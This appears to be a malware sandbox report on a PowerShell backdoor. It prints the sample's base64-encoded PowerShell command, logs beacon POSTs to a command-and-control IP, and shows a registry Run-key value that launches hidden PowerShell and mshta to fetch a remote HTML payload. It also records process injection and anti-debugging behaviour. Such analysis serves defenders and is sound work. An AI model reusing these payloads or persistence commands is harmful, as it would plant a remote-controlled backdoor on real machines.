MAaABhAHIAQQByAHIAYQB5AFsAMABdACAALQBJAG4AcAB1AHQATwBiAGoAZQBjAHQAIAAkAFQAYQBzAGsAOwAkAE4AQQBEAHAAZABvAEcAUQBEAEIAbwAgAD0AIAAnAFIAPQAnACAAKwAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnAG8AawAnACkAKQA7AGYAcABCAGIAIAAkAHkAeQBWAEcAUABoAEIATABZAHAAcQBFAHoARgAgACQATgBBAEQAcABkAG8ARwBRAEQAQgBvADsAfQB9AGkAZgAgACgAJABOAEcAZwBYAG4AVABOAE4ARgBHAEwAeQAuAEMAbwBuAHQAYQBpAG4AcwAoACcAegBpAHAAOgAnACkAKQB7ACQAVgB4AFkAYwBOAGUAZQBaAHEATgBCAEkAQQB4AD0AJABOAEcAZwBYAG4AVABOAE4ARgBHAEwAeQAuAFMAdQBiAFMAdAByAGkAbgBnACgANAApADsAJABDAGgAYQByAEEAcgByAGEAeQAgAD0AJABWAHgAWQBjAE4AZQBlAFoAcQBOAEIASQBBAHgALgBTAHAAbABpAHQAKAAnAHwAfAAnACkAOwBpAGYAIAAoACQAQwBoAGEAcgBBAHIAcgBhAHkALgBMAGUAbgBnAHQAaAAgAC0AZQBxACAAMwApAHsARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAAJABDAGgAYQByAEEAcgByAGEAeQBbADAAXQAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwAyAF0AOwAkAE4AQQBEAHAAZABvAEcAUQBEAEIAbwAgAD0AIAAnAFIAPQAnACAAKwAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnAG8AawAnACkAKQA7AGYAcABCAGIAIAAkAHkAeQBWAEcAUABoAEIATABZAHAAcQBFAHoARgAgACQATgBBAEQAcABkAG8ARwBRAEQAQgBvADsAfQB9AGkAZgAgACgAJABOAEcAZwBYAG4AVABOAE4ARgBHAEwAeQAuAEMAbwBuAHQAYQBpAG4AcwAoACcAcgBlAG4AYQBtAGUAOgAnACkAKQB7ACQAVgB4AFkAYwBOAGUAZQBaAHEATgBCAEkAQQB4AD0AJABOAEcAZwBYAG4AVABOAE4ARgBHAEwAeQAuAFMAdQBiAFMAdAByAGkAbgBnACgANwApADsAJABDAGgAYQByAEEAcgByAGEAeQAgAD0AJABWAHgAWQBjAE4AZQBlAFoAcQBOAEIASQBBAHgALgBTAHAAbABpAHQAKAAnAHwAfAAnACkAOwBpAGYAIAAoACQAQwBoAGEAcgBBAHIAcgBhAHkALgBMAGUAbgBnAHQAaAAgAC0AZQBxACAAMwApAHsAUgBlAG4AYQBtAGUALQBJAHQAZQBtACAAJABDAGgAYQByAEEAcgByAGEAeQBbADAAXQAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwAyAF0AOwAkAE4AQQBEAHAAZABvAEcAUQBEAEIAbwAgAD0AIAAnAFIAPQAnACAAKwAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnAG8AawAnACkAKQA7AGYAcABCAGIAIAAkAHkAeQBWAEcAUABoAEIATABZAHAAcQBFAHoARgAgACQATgBBAEQAcABkAG8ARwBRAEQAQgBvADsAfQB9AGkAZgAgACgAJABOAEcAZwBYAG4AVABOAE4ARgBHAEwAeQAuAEMAbwBuAHQAYQBpAG4AcwAoACcAZABlAGwAOgAnACkAKQB7ACQAVgB4AFkAYwBOAGUAZQBaAHEATgBCAEkAQQB4AD0AJABOAEcAZwBYAG4AVABOAE4ARgBHAEwAeQAuAFMAdQBiAFMAdAByAGkAbgBnACgANAApADsAaQBmACAAKABUAGUAcwB0AC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAVgB4AFkAYwBOAGUAZQBaAHEATgBCAEkAQQB4ACkAewBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAkAFYAeABZAGMATgBlAGUAWgBxAE4AQgBJAEEAeAA7ACQATgBBAEQAcABkAG8ARwBRAEQAQgBvACAAPQAgACcAUgA9ACcAIAArACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACcAbwBrACcAKQApADsAZgBwAEIAYgAgACQAeQB5AFYARwBQAGgAQgBMAFkAcABxAEUAegBGACAAJABOAEEARABwAGQAbwBHAFEARABCAG8AOwB9AH0AfQB9AH0AIABDAGEAdABjAGgAewB9AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADcAOwB9AHcAaABpAGwAZQAoACQAdAByAHUAZQAgAC0AZQBxACAAJAB0AHIAdQBlACkA filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	1	1	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory June 1, 2023, 7:53 p.m.	process_identifier: 3028 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 16 (PAGE_EXECUTE) base_address: 0x03bd0000 process_handle: 0xffffffff	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses June 1, 2023, 7:54 p.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (7 events)

Data received	HTTP/1.1 200 OK Date: Thu, 01 Jun 2023 10:54:46 GMT Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.0.25 X-Powered-By: PHP/8.0.25 Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Data received	HTTP/1.1 200 OK Date: Thu, 01 Jun 2023 10:54:54 GMT Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.0.25 X-Powered-By: PHP/8.0.25 Content-Length: 0 Content-Type: text/html; charset=UTF-8
Data received	HTTP/1.1 200 OK Date: Thu, 01 Jun 2023 10:55:01 GMT Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.0.25 X-Powered-By: PHP/8.0.25 Content-Length: 0 Content-Type: text/html; charset=UTF-8
Data received	HTTP/1.1 200 OK Date: Thu, 01 Jun 2023 10:55:08 GMT Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.0.25 X-Powered-By: PHP/8.0.25 Content-Length: 0 Content-Type: text/html; charset=UTF-8
Data received	HTTP/1.1 200 OK Date: Thu, 01 Jun 2023 10:55:16 GMT Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.0.25 X-Powered-By: PHP/8.0.25 Content-Length: 0 Content-Type: text/html; charset=UTF-8
Data received	HTTP/1.1 200 OK Date: Thu, 01 Jun 2023 10:55:23 GMT Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.0.25 X-Powered-By: PHP/8.0.25 Content-Length: 0 Content-Type: text/html; charset=UTF-8
Data received	HTTP/1.1 200 OK Date: Thu, 01 Jun 2023 10:55:30 GMT Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.0.25 X-Powered-By: PHP/8.0.25 Content-Length: 0 Content-Type: text/html; charset=UTF-8

Poweshell is sending data to a remote host (2 events)

Data sent	POST /control/com.php?U=TEST22-PC-test22 HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 172.93.181.249 Content-Length: 0 Connection: Keep-Alive
Data sent	POST /control/com.php?U=TEST22-PC-test22 HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 172.93.181.249 Content-Length: 0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW June 1, 2023, 7:53 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (8 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Communicates with host for which no DNS query was performed (1 event)

host

172.93.181.249

Installs itself for autorun at Windows startup (1 event)

reg_key

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\JQQwE

reg_value

c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 474465 2.2.2.2 || mshta http://172.93.181.249/control/html/1.html

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (7 events)

Time & API	Arguments	Status	Return
send June 1, 2023, 7:54 p.m.	buffer: POST /control/com.php?U=TEST22-PC-test22 HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 172.93.181.249 Content-Length: 0 Connection: Keep-Alive socket: 1264 sent: 167	1	167
send June 1, 2023, 7:54 p.m.	buffer: POST /control/com.php?U=TEST22-PC-test22 HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 172.93.181.249 Content-Length: 0 socket: 1264 sent: 143	1	143
send June 1, 2023, 7:54 p.m.	buffer: POST /control/com.php?U=TEST22-PC-test22 HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 172.93.181.249 Content-Length: 0 socket: 1264 sent: 143	1	143
send June 1, 2023, 7:54 p.m.	buffer: POST /control/com.php?U=TEST22-PC-test22 HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 172.93.181.249 Content-Length: 0 socket: 1264 sent: 143	1	143
send June 1, 2023, 7:55 p.m.	buffer: POST /control/com.php?U=TEST22-PC-test22 HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 172.93.181.249 Content-Length: 0 socket: 1264 sent: 143	1	143
send June 1, 2023, 7:55 p.m.	buffer: POST /control/com.php?U=TEST22-PC-test22 HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 172.93.181.249 Content-Length: 0 socket: 1264 sent: 143	1	143
send June 1, 2023, 7:55 p.m.	buffer: POST /control/com.php?U=TEST22-PC-test22 HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 172.93.181.249 Content-Length: 0 socket: 1264 sent: 143	1	143

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 3028 resumed a thread in remote process 2200
NtResumeThread June 1, 2023, 7:53 p.m.	thread_handle: 0x0000032c suspend_count: 1 process_identifier: 2200	1	0	0

Creates a suspicious Powershell process (4 events)

option	-ep bypass	value	Attempts to bypass execution policy
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-ep bypass	value	Attempts to bypass execution policy
option	-windowstyle hidden	value	Attempts to execute command with a hidden window

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

1.html

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All